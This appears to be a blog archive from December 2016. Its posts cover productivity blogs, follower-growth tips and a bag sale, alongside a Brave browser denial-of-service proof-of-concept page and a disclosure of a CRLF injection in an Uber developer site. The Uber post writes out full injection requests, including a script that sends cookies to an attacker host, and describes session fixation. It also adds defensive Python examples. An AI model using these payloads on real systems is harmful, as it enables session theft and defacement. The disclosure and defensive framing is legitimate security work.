Friday 16 December 2016

BRAVE BROWSER DOS


Brave.html file
<html>
<head>
<title>Brave Window Object Remote Denial of Service</title>
</head>
<body>
<br><br>
<h1><center>Brave Window Object Remote Denial of Service</center></h1>
<br><br>
<h2><center>Proof of Concept</center></h2>
<br><br>
<center>
<b>Click the link below to trigger the vulnerability.</b><br><br>
<hr>
<hr>
<!-- The link runs window.close(self) through a javascript: URL; this is the call the PoC uses to trigger the reported denial of service. -->
<b><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></b>
</center>
</body>
</html>




Wednesday 14 December 2016

The Mara bag



Pop-Up Shop: The Mara Bag


Today I have for sale one of my favorite items I've ever owned.  :) 

You could say I'm very excited to post this. 










The Mara Bag - (3) Available

Price: $15

Tuesday 13 December 2016

Productivity blogs (which can change your life) - 2

7. Dumb Little Man aims to make your life and work more efficient

Dumb Little Man
Dumb Little Man writes about “anything that makes life and work more efficient, more profitable, and, um, easy.” Started in 2006, the blog’s creator notes on the site that, to this day, he’s “not sure where the name Dumb Little Man came from.” — 1-2 posts per day

8. The Fast Track gives you tools to get the job done fast

The Fast Track
The Fast Track presents “tools to get the job done fast.” The blog is a product of Intuit's online database software Quickbase. — 1 post per day

9. Time Management Ninja helps get more done with minimal effort

Time Management Ninja
Time Management Ninja focuses on time management, productivity, clutter and wasted time. It’s the personal blog of Craig Jarrow, who began the project in 2009. — 3 posts per week

10. Pick the Brain is dedicated to self improvement

Pick the Brain
Pick the Brain shares information on personal productivity, motivation and self education. Launched in 2006, the blog says it diverges from traditional “self-help” by taking a broader approach. — 1 post per day

11. WorkAwesome wants you to work better

WorkAwesome
WorkAwesome shares knowledge about starting, completing and trying new things. Tina Su started the blog in 2008 after serving as a software engineer and user-experience designer at Amazon. — 2-3 posts per week

12. Asian Efficiency is two friends sharing tips

Asian Efficiency
Asian Efficiency shows ways to complete daily tasks, projects and assignments in the optimal time possible. Two friends started the blog after encouragement from comrades of theirs who turned to them for productivity advice. — 2-3 posts per week

Productivity blogs (which can change your life) - 1

Hi all,

As makers of a platform that increases productivity, we’re big fans of other products and resources that help individuals in the same way. Last week, we shared our 10 favorite new productivity apps from 2013, and now as we kick off the year, we’re sharing a sample of our team’s productivity reading list.
For each outlet, we’ve dug up three popular posts from last year based on social media sharing numbers—a “shares” tally from Facebook, Twitter, Google+ and LinkedIn. To find this number, we relied on Moz’s Open Site Explorer and the simpler ShareTally, two great tools that help reveal a site’s traffic and social virality. Each description also features the publishing frequency of the blog, a number garnered from Michael Shipley’s RSS Feed Analyzer.

1. Buffer is big on life hacks and social media tips

Buffer
Buffer blogs about productivity, life hacks, writing, user experience, customer happiness and business. The three-year-old startup might be better known for its social media sharing tool, but it’s quickly building up a reputation for its writing, too. — 3-4 posts per week

2. Lifehacker is a fire hose of tips and tricks

Lifehacker
Lifehacker shares tips, tricks and downloads for getting things done. This blog is the granddaddy of the group, getting its start in January 2005, and earning loads of accolades since, including TIME’s "25 Sites We Can't Live Without" in 2006. — 1 post per hour

3. Marc and Angel Hack Life lends practical tips, personal experience

Marc and Angel Hack Life
Marc and Angel Hack Life offers inspirational advice and practical tips for life. The husband-and-wife blogging duo, who have been at it since 2006, also share opinions on noteworthy events and people in and around their lives. — 3 posts per week

4. Lifehack focuses on getting things done efficiently and effectively

Lifehack
Lifehack offers advice, resources, tips and tricks to help you get things done more efficiently and effectively. Like similarly named blog Lifehacker, Lifehack is a veteran at dispersing such tips, too, getting its start the same year, 2005. — 1 post per hour

5. 99U empowers you to execute ideas

99U
99U offers insights on creativity and productivity. The blog is a product of online portfolio site Behance, which calls the online publication the “missing curriculum” for making ideas happen. — 1 post per day

Uber (CRLF attack) hacks

Hi all,

The website located at https://developer.uber.com/ suffers from CRLF injection. This allows me to inject JavaScript, HTML as well as arbitrary HTTP Headers. Besides this, I can change the HTTP Response code as well, to display whatever I want in the victim's browser.
The vulnerability resides in the path https://developer.uber.com/dashboard
Please note that navigating to this website as is, without logging in, will give a 302 redirect to the login page. However, we can send the following HTTP Request:
GET /dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Ealert("Injected js")%3C/script%3E%0d%0a%0d%0a<!-- HTTP/1.1
Host: developer.uber.com
Referer: https://developer.uber.com/
Cookie: XSRF-TOKEN=OkkZ43igro0JS7lm%2B2pdjhh1%2FzzqkueR%2Fgfs4%3D; connect.sid=s%3AHgMm40tOJjVdF6js3Oxv8GP4.RE%2F3fmd02tETNwUaC8AhFzUhLSqsjcCYZo5NsgP%2BTf8;
Host: developer.uber.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Connection: close
The HTTP Response contains the injected HTTP Headers and the Cookie!
So apparently, the Web Application Server parses the current path of the web application (which in this case is /dashboard) and just appends it to the Location header. So if we change the "Location", i.e. /dashboard/, to /dashboard/%0d%0aHeader: Random, then in the HTTP Response, the %0d%0a will create a new line followed by a new header, "Header: Random".
Hence using injected Line breaks (CRLFs), we are able to add new HTTP Headers and content.
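The mechanism described above, as an added example that is not code from the original post or from the affected site: a redirect handler that pastes the decoded request path into the Location header, beside a hardened version that rejects control characters and re-encodes the path. The host https://app.example and all function names are assumptions; the path is the /dashboard/%0d%0aHeader: Random illustration from the text.

```python
from urllib.parse import quote, unquote

BASE = "https://app.example"  # assumed placeholder host, not from the report


def _redirect(location_path):
    """Serialize a bare 302 response whose Location ends with location_path."""
    head = (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: {BASE}{location_path}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode("utf-8")


def naive_redirect(raw_path):
    """Weak pattern: decode the request path and paste it into Location."""
    return _redirect(unquote(raw_path))  # %0d%0a is now a real CR LF


def safe_redirect(raw_path):
    """Hardened pattern: refuse control characters, then re-encode the path."""
    path = unquote(raw_path)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in path):
        return b"HTTP/1.1 400 Bad Request\r\nConnection: close\r\n\r\n"
    return _redirect(quote(path, safe="/"))  # only URL-safe bytes reach the header


def header_names(response):
    """Header names a client sees before the first blank line."""
    head = response.split(b"\r\n\r\n", 1)[0].decode("utf-8", "replace")
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]


# Path from the text's own illustration of the bug.
INJECTED = "/dashboard/%0d%0aHeader: Random"

if __name__ == "__main__":
    print(header_names(naive_redirect(INJECTED)))      # extra "Header" line appears
    print(header_names(safe_redirect(INJECTED)))       # request refused with 400
    print(header_names(safe_redirect("/dashboard/")))  # ordinary redirect still works
```
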
The Response is as follows:
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 25 Mar 2016 15:17:54 GMT
Content-Type: text/html
Content-Length: 154
Location: https://developer.uber.com/dashboard/
Content-Type: text/html
HTTP/1.1 200 OK
Set-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"

<html>Hacker Content</html>

<script>alert("Injected js")</script>

<!--
Connection: close
Set-Cookie: oauth2_sid=deleted; path=/; Expires=Thu, 01-Jan-1970 00:00:01 GMT
Strict-Transport-Security: max-age=0
X-XSS-Protection: 1; mode=block
Cache-Control: max-age=0

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
As is evident from the Response, both the HTML and JavaScript injections work. The first image is a screenshot of the rendered HTTP Response. The rendering of the JavaScript makes this a Cross-Site Scripting vulnerability as well, and since the cookies aren't "Secure" and "HttpOnly" (bugs which aren't allowed in the bounty! ;]), they can easily be extracted by JavaScript and POSTed to my server, making it a Cookie Stealing vulnerability as well. Using this HTTP Request:
GET /dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Evar+img=new+Image();img.src="http://www.hacker.com/incoming.php?coo="%20+%20document.cookie;%3C/script%3E%0d%0a%0d%0a<!-- HTTP/1.1
Host: developer.uber.com
Referer: https://developer.uber.com/
Cookie: XSRF-TOKEN=OkkZ43igro0JS7lm%2B2pdjhh1%2FzzqkueR%2Fgfs4%3D; connect.sid=s%3AHgMm40tOJjVdF6js3Oxv8GP4.RE%2F3fmd02tETNwUaC8AhFzUhLSqsjcCYZo5NsgP%2BTf8;
Host: developer.uber.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Connection: close
Finally, the setting of arbitrary Cookies also renders the Web Application vulnerable to Session Fixation, wherein I can set an arbitrary cookie in the GET request and wait for the victim to click on the link and log in. In this case, the cookie which I've set will then identify the victim's account. Using the same cookie in my browser will authenticate the attacker to his account as well.
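
An added example, not part of the original post or of the affected application, of the two server-side fixes the last paragraphs point to: issuing a fresh session id at login so a planted id never becomes authenticated, and marking the session cookie Secure and HttpOnly so script cannot read it. The SessionStore class and the planted value are hypothetical; only the cookie name oauth2_sid comes from the request above.

```python
import secrets


class SessionStore:
    """In-memory session table (session id -> user); a hypothetical stand-in."""

    def __init__(self, hardened):
        self.hardened = hardened
        self.sessions = {}

    def login(self, presented_sid, user):
        """Authenticate `user`; return (session id, Set-Cookie header value)."""
        if self.hardened:
            # Drop whatever id the browser arrived with and mint a fresh one,
            # so an id planted before login never becomes an authenticated one.
            self.sessions.pop(presented_sid, None)
            sid = secrets.token_urlsafe(32)
            cookie = f"oauth2_sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"
        else:
            # Weak pattern: keep the pre-login id and send a script-readable cookie.
            sid = presented_sid or secrets.token_urlsafe(32)
            cookie = f"oauth2_sid={sid}; Path=/"
        self.sessions[sid] = user
        return sid, cookie

    def whoami(self, sid):
        """Return the user bound to `sid`, or None if the id is not authenticated."""
        return self.sessions.get(sid)


def fixation_outcome(hardened):
    """Replay the scenario: a known id is planted, then the victim logs in."""
    planted = "planted-session-id"  # constructed value, known to a third party
    store = SessionStore(hardened)
    sid, cookie = store.login(planted, "victim")
    attrs = [a.strip().lower() for a in cookie.split(";")[1:]]
    return {
        "planted_id_authenticated": store.whoami(planted) == "victim",
        "id_rotated": sid != planted,
        "httponly": "httponly" in attrs,
        "secure": "secure" in attrs,
    }


if __name__ == "__main__":
    print("weak:    ", fixation_outcome(False))
    print("hardened:", fixation_outcome(True))
```
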

Sunday 11 December 2016

10 BEST WAYS TO INCREASE FOLLOWERS IN ANY SOCIAL MEDIA

Hi all,
There are many bloggers looking to gain followers on their new or established blogs. One of the most common questions of new bloggers is, "How can I gain more followers?". While the number of followers is not important to some, we understand wanting to grow your readership is important to many. Please note, if you are a new blogger gaining followers will not always equal gaining readers, the two are not always the same. For more information check out, "My Blog Numbers: Readers vs. Followers". However, if it is followers you are looking to gain, here are a few useful ways to meet other bloggers and gain followers:

IF YOU ARE LOOKING TO GAIN FOLLOWERS YOU MUST MUST MUST HAVE A WAY FOR BLOGGERS TO FOLLOW YOU!

It is very difficult and frustrating for bloggers to stop by your blog to follow you only to find out that you have given them no means by which to do so.

PLEASE, get yourself the Blogger friends widget. This makes it MUCH easier for bloggers to follow you easily and quickly, post it where it is visible and easy to find. If you insist on not having this then post a way to follow you via RSS.

Following are a few great ways to gain followers for your blog:

1) Blog Hops- Love, love, love blog hops. They are a bit time consuming but they are a wonderful way to meet new bloggers, find blogs to follow, and gain followers on your own blog. For more information on blog hops check out this post, "What Is A Blog Hop Anyway?". You can also find a list of member blog hops here on our blog hop list.

2) Giveaways- When I first started blogging, I gained a great deal of followers during my 1st giveaway. This may be something you want to do once you hit 100 followers; that way you have people to spread the word. Also, think of something really great to give away; the greater the gift, the more people will want to participate. By great, I mean something that many bloggers would want- a gift card, a piece of jewelry, a book if you are a book blogger, etc. IT DOES NOT HAVE TO BE A LOT OF MONEY, just something fun. Make sure your #1 way to enter is to follow you on your blog; you can then join giveaway hops to promote your giveaway, among other things. We will soon have some great information on giveaways, as it is one of our upcoming Blog Talk topics, so stay tuned if you are interested!

3) Blog Events- There are 2 ways in which blog events can be useful in gaining followers:

A) You become a sponsor- when you sponsor an event, the host you are sponsoring usually promotes your blog beforehand. Then during the event, one of the requirements is to follow you. Additionally, many hosts also allow multiple ways to enter, like following you on Facebook and Twitter. So you offer them something to give away during the event and in return you get a lot of publicity and thus more followers! You can find lots of events that need sponsors in our group: Blog Sponsor Connection, or contact the hosts of any events on our events page.

B) Participating in blog events is also a good way to gain followers, you will not gain as many as if you are a sponsor but you will find a lot of new blogs to follow and if you leave comments you may get a few followers in return.

4) Comment, Comment, Comment!- Leaving comments is almost always a surefire way to gain followers. As a blogger you know that it is hard to get readers to leave comments, so when people do, bloggers like to stop by and see who has left a comment for them. If you use your Google account, your name should be linked to your blog or profile. Make sure you have your blog listed on your Blogger profile. PLEASE, do not leave a comment only asking a blogger to stop by your blog and follow you; instead comment on their post or blog, let them know you are now following them, and then you can say something like "I'd love to have you stop by my blog if you have time"- however, most will stop by without you asking them to.

5) Blog Challenges- Blog challenges, also known as blogfests, are a fun way to meet new bloggers, gain followers, and kick up your blog posts. The way challenges work is a host will post details; most challenges are a month long. Every day the host will post a topic that you will write a blog post on; once you write your post, you leave a link to it on the host's site. Everyone participating lists their links to their daily post on the topic, so you can stop by, comment, and follow them, and they do the same in return.

6) Communities- One of the main reasons for creating this community was to connect bloggers! Communities are a great way to meet new bloggers and gain followers. The great thing is there are tons of communities; if you are not a member of our community you can join here. Blogfrog is another community-based opportunity to gain followers, and there are tons of others; just Google "blogging communities"!

7) Share your posts on Twitter- You can set up your posts to auto post to Twitter. This is a great way to promote your posts and maybe get a few new followers. Be sure your posts include some key words that may interest others. Also, make sure you have added your blog URL to your Twitter profile; I can't tell you how many times I have found someone interesting on Twitter and then I can't find a URL to their blog or website.

8) Share a link on Facebook- Facebook also allows you to auto post your blog posts to your wall. This is a great way to let people who follow you on Facebook know about your posts and blog. With a link on the auto post, this brings in new readers and new followers. Again, remember to list your blog address on your Facebook profile.

9) Write Guest Posts- Many bloggers are looking for guest bloggers to write a post on their niche, or even feature. This is a great way to promote your blog. The author of the blog that you are guest posting on will link back to your site, allowing others to stop by, visit, and possibly follow. If you are not sure where to find blogs to guest post on, Melissa started a great group here to connect those who are looking for guest bloggers; you can check out her group Guest Post to see what it's all about!

10) Content Counts- One way to get more followers is to get more traffic, to get more traffic you need to be writing quality content. By high quality we just mean remember your audience, try to post on a regular basis and maybe brush up on your SEO tools. 

Above all, remember that the number of followers you have does not determine the success of your blog. Don't get too caught up on a number. Growing your blog takes time. You could have 1000 followers and only 100 readers, meaning just because someone follows your blog does not mean they are an active follower who stops by and reads your posts, and that's okay. Be patient and with time your blog readership is bound to grow.